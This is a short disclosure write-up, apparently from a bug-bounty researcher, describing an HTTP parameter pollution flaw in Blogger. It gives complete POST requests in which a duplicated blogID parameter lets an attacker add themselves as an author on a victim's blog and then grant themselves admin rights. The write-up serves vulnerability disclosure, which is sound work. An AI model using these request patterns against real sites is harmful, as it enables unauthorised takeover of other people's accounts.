How I Hacked Any Blogger Account

     How I Hacked Any Blogger Account 

Technical details:


Below, you’ll find the steps for gaining admin control permissions over virtually any Blogger account:

1.

The attacker uses the invite author options in Blogger (i.e. add authors).

Vulnerability location:



POST /add-authors.do HTTP/1.1

Request:



security_token=attackertoken&blogID=attackerblogidvalue&blogID=victimblogidvalue&authorsList=goldshlager19test%40gmail.com(attacker email)&ok=Invite

As you can see I added two blogid value in my post request (blogID=attackerblogidvalue&blogID=victimblogidvalue)





The server examines the first blogid value and then executes the attacker’s second blogid value.



2.

The attacker will then receive an email to confirm him as an author (author invitation link). The attacker will be added as an author on the victim’s account.



3.

It is now possible to alter the attacker permission so that it rises from a simple author to an actual admin.

Vulnerability Location:

POST /team-member-modify.do HTTP/1.1

Request:

security_token=attackertoken&blogID=attackerownblogid&blogID=victimblogidvalue&memberID=attackermemberid&isAdmin=true&ok=Grant+admin+privileges